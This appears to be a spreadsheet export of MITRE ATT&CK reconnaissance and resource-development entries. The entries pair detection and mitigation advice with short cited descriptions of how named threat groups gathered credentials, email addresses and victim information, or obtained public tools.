APT28
[APT28](https://attack.mitre.org/groups/G0007) has harvested user's login credentials.(Citation: Microsoft Targeting Elections September 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has collected credentials for the target organization from previous breaches for use in brute force attacks.(Citation: NCC Group Chimera January 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has collected compromised credentials to use for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) gathered credentials from two victims that they then attempted to validate across 75 different websites. [Magic Hound](https://attack.mitre.org/groups/G0059) has also collected credentials from over 900 Fortinet VPN servers in the US, Europe, and Israel.(Citation: IBM ITG18 2020)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) conducted extensive reconnaissance research on potential targets.(Citation: ClearSky Lazarus Aug 2020)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors targeted people based on their organizational roles and privileges.(Citation: FoxIT Wocao December 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has conducted targeted surveillance against activists and bloggers.(Citation: Amnesty Intl. Ocean Lotus February 2021)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has researched employees to target for social engineering attacks.(Citation: Mandiant FIN13 Aug 2022)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has identified specific potential victims at targeted organizations.(Citation: ClearSky Siamesekitten August 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed information of target employees to enhance their social engineering lures.(Citation: MSTIC DEV-0537 Mar 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.(Citation: Proofpoint TA453 July2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has interacted with Office 365 tenants to gather details regarding target's environments.(Citation: Microsoft HAFNIUM March 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).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User Training
Users can be trained to identify social engineering techniques and spearphishing attempts.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) sent Telegram messages impersonating IT personnel to harvest credentials.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.(Citation: Google EXOTIC LILY March 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) gathered the fully qualified domain names (FQDNs) for targeted Exchange servers in the victim's environment.(Citation: Volexity Exchange Marauder March 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can gather information about a tenant’s domains using public Microsoft APIs.(Citation: AADInternals Documentation)(Citation: Azure AD Recon)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has limited its watering hole attacks to specific IP address ranges.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has obtained IP addresses for publicly-accessible Exchange servers.(Citation: Volexity Exchange Marauder March 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has captured the IP addresses of visitors to their phishing sites.(Citation: Google Iran Threats October 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has searched for infrastructure that can provide remote access to an environment for targeting efforts.(Citation: Mandiant FIN13 Aug 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can also help detect links leading to known malicious sites.(Citation: Mandiant URL Obfuscation 2023)
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Furthermore, monitor network traffic for homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Also monitor and analyze traffic patterns and packet inspection for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites,  &lt;code&gt; Mirrored from (victim URL)&lt;/code&gt; may be visible in the HTML section of packets. 
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Software Configuration
Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Furthermore, policies may enforce / install browser extensions that protect against IDN and homograph attacks. Browser password managers may also be configured to only populate credential fields when the URL matches that of the original, legitimate site. 
User Training
Users can be trained to identify social engineering techniques and spearphishing attempts. Additionally, users may perform visual checks of the domains they visit; however, homographs in ASCII and in IDN domains and URL schema obfuscation may render manual checks difficult. Phishing training and other cybersecurity training may raise awareness to check URLs before visiting the sites.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has conducted credential phishing campaigns with embedded links to attacker-controlled domains.(Citation: Google TAG Ukraine Threat Landscape March 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used malicious links to direct users to web pages designed to harvest credentials.(Citation: Volexity Ocean Lotus November 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.(Citation: US-CERT TA18-074A)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used links in e-mail to steal account information.(Citation: VirusBulletin Kimsuky October 2019)(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used SMS and email messages with links designed to steal credentials or track victims.(Citation: Certfa Charming Kitten January 2021)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Google Iran Threats October 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered web bugs to profile their intended targets.(Citation: Proofpoint TA416 Europe March 2022)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Volexity Patchwork June 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious links to credential harvesting websites.(Citation: ATT Sidewinder January 2021)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS August 2018)(Citation: Proofpoint TA407 September 2019)(Citation: Secureworks COBALT DICKENS September 2019)(Citation: Malwarebytes Silent Librarian October 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used web beacons in e-mails to track hits to attacker-controlled URL's.(Citation: Microsoft Targeting Elections September 2020)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can send phishing emails containing malicious links designed to collect users’ credentials.(Citation: AADInternals Documentation)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has been delivered via malicious links in phishing emails.(Citation: FireEye Shining A Light on DARKSIDE May 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has collected location information from visitors to their phishing sites.(Citation: Google Iran Threats October 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) gathered victim organization information to identify specific targets.(Citation: ClearSky Lazarus Aug 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others.(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.(Citation: Kaspersky ThreatNeedle Feb 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) targeted specific individuals within an organization with tailored job vacancy announcements.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has identified executives, HR, and IT staff at victim organizations for further targeting.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed knowledge of team structures within a target organization.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)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Software Configuration
Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
User Training
Users can be trained to identify social engineering techniques and spearphishing attempts.
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.(Citation: US-CERT TA18-074A)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has crafted generic lures for spam campaigns to collect emails and credentials for targeting efforts.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious attachments that lead victims to credential harvesting websites.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Cyble Sidewinder September 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers.
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Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Software Configuration
Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
User Training
Users can be trained to identify social engineering techniques and spearphishing attempts.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used spearphishing to compromise credentials.(Citation: Microsoft Targeting Elections September 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
Scattered Spider
[Scattered Spider](https://attack.mitre.org/groups/G1015) has used a combination of credential phishing and social engineering to capture one-time-password (OTP) codes.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) targeted presidential campaign staffers with credential phishing e-mails.(Citation: Google Election Threats October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.(Citation: TrendMicro New Andariel Tactics July 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has captured the user-agent strings from visitors to their phishing sites.(Citation: Google Iran Threats October 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has researched software code to enable supply-chain operations, most notably for the 2017 [NotPetya](https://attack.mitre.org/software/S0368) attack. [Sandworm Team](https://attack.mitre.org/groups/G0034) also collected a list of computers using specific software as part of its targeting efforts.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
APT32
[APT32](https://attack.mitre.org/groups/G0050) has collected e-mail addresses for activists and bloggers in order to target them with spyware.(Citation: Amnesty Intl. Ocean Lotus February 2021)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has gathered targeted individuals' e-mail addresses through open source research and website contact forms.(Citation: Google EXOTIC LILY March 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected e-mail addresses for users they intended to target.(Citation: Volexity Exchange Marauder March 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has targeted executives, human resources staff, and IT personnel for spearphishing.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has collected valid email addresses that were subsequently used in spearphishing campaigns.(Citation: Malwarebytes Kimsuky June 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered employee email addresses, including personal accounts, for social engineering and initial access efforts.(Citation: MSTIC DEV-0537 Mar 2022)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.(Citation: Kaspersky ThreatNeedle Feb 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has identified high-value email accounts in academia, journalism, NGO's, foreign policy, and national security for targeting.(Citation: Proofpoint TA453 July2021)(Citation: Google Iran Threats October 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has specifically targeted government agency employees with spearphishing e-mails.(Citation: Anomali Static Kitten February 2021)	 
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has collected e-mail addresses from targeted organizations from open Internet searches.(Citation: DOJ Iran Indictments March 2018)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used spoofed company emails that were acquired from email clients on previously infected hosts to target other individuals.(Citation: Unit 42 TA551 Jan 2021)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can check for the existence of user email addresses using public Microsoft APIs.(Citation: AADInternals Documentation)(Citation: Azure AD Recon)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has collected victim employee name information.(Citation: KISA Operation Muzabi)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034)'s research of potential victim organizations included the identification and collection of employee information.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has collected lists of names for individuals from targeted organizations.(Citation: DOJ Iran Indictments March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has scanned specific lists of target IP addresses.(Citation: Trend Micro TeamTNT)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers.
User Training
Users can be trained to identify and report social engineering techniques and spearphishing attempts, while also being suspicious of and verifying the identify of callers.(Citation: CISA Phishing)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used phone calls to instruct victims to navigate to credential-harvesting websites.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has called victims' help desk to convince the support personnel to reset a privileged account’s credentials.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has collected open source information to identify relationships between organizations for targeting purposes.(Citation: Gigamon Berserk Bear October 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed knowledge of an organization's supply chain relationships.(Citation: MSTIC DEV-0537 Mar 2022)
Sandworm Team
In preparation for its attack against the 2018 Winter Olympics, [Sandworm Team](https://attack.mitre.org/groups/G0034) conducted online research of partner organizations listed on an official PyeongChang Olympics partnership site.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)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
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Metadata
Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors obtained multiple publicly-available tools, including METASPLOIT, UNICORN, and NorthStar C2.(Citation: Mandiant UNC3890 Aug 2022)
C0015
For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained a variety of tools, including [AdFind](https://attack.mitre.org/software/S0552),  AnyDesk, and Process Hacker.(Citation: DFIR Conti Bazar Nov 2021)
C0017
For [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.(Citation: Mandiant APT41)
C0018
For [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors acquired a variety of open source tools, including [Mimikatz](https://attack.mitre.org/software/S0002), [Sliver](https://attack.mitre.org/software/S0633), SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
C0021
For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used [Cobalt Strike](https://attack.mitre.org/software/S0154) configured with a modified variation of the publicly available Pandora Malleable C2 Profile.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) obtained and used multiple tools including the LINpeas privilege escalation utility, aws_consoler, rsocx reverse proxy, Level RMM tool, and RustScan port scanner.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors obtained open source tools to use in their operations.(Citation: BlackBerry CostaRicto November 2020) 
Frankenstein
For [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors obtained and used [Empire](https://attack.mitre.org/software/S0363).(Citation: Talos Frankenstein June 2019)
FunnyDream
For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a modified version of the open source [PcShare](https://attack.mitre.org/software/S1050) remote administration tool.(Citation: Bitdefender FunnyDream Campaign November 2020)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors obtained and used tools such as [gsecdump](https://attack.mitre.org/software/S0008).(Citation: McAfee Night Dragon)
Operation CuckooBees
For [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors obtained publicly-available JSP code that was used to deploy a webshell onto a compromised server.(Citation: Cybereason OperationCuckooBees May 2022)   
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) obtained tools such as Wake-On-Lan, [Responder](https://attack.mitre.org/software/S0174), ChromePass, and dbxcli.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors obtained packers such as CyaX.(Citation: ESET Operation Spalax Jan 2021)
Operation Wocao
For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and [BloodHound](https://attack.mitre.org/software/S0521).(Citation: FoxIT Wocao December 2019)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) obtained and used a modified variant of [Imminent Monitor](https://attack.mitre.org/software/S0434).(Citation: QiAnXin APT-C-36 Feb2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has used various open-source tools for privilege escalation purposes.(Citation: Mandiant APT1)
APT19
[APT19](https://attack.mitre.org/groups/G0073) has obtained and used publicly-available tools like [Empire](https://attack.mitre.org/software/S0363).(Citation: NCSC Joint Report Public Tools)(Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has obtained and used open-source tools like [Koadic](https://attack.mitre.org/software/S0250), [Mimikatz](https://attack.mitre.org/software/S0002), and [Responder](https://attack.mitre.org/software/S0174).(Citation: Palo Alto Sofacy 06-2018)(Citation: Securelist Sofacy Feb 2018)(Citation: FireEye APT28 Hospitality Aug 2017)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has obtained and used a variety of tools including [Mimikatz](https://attack.mitre.org/software/S0002), [SDelete](https://attack.mitre.org/software/S0195), [Tor](https://attack.mitre.org/software/S0183), [meek](https://attack.mitre.org/software/S0175), and [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Mandiant No Easy Breach)(Citation: F-Secure The Dukes)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Cobalt Strike](https://attack.mitre.org/software/S0154), and a variety of other open-source tools from GitHub.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has obtained and leveraged publicly-available tools for early intrusion activities.(Citation: FireEye APT33 Guardrail)(Citation: Symantec Elfin Mar 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has obtained and used open-source tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: ESET Lazarus KillDisk April 2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has modified and used customized versions of publicly-available tools like PLINK and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: BitDefender Chafer May 2020)(Citation: IBM ITG07 June 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [pwdump](https://attack.mitre.org/software/S0006), [PowerSploit](https://attack.mitre.org/software/S0194), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: FireEye APT41 Aug 2019)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.(Citation: SentinelOne Aoqin Dragon June 2022)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has acquired and used [Cobalt Strike](https://attack.mitre.org/software/S0154) in its operations.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has obtained tools such as PuTTY for use in their operations.(Citation: Forcepoint BITTER Pakistan Oct 2016)
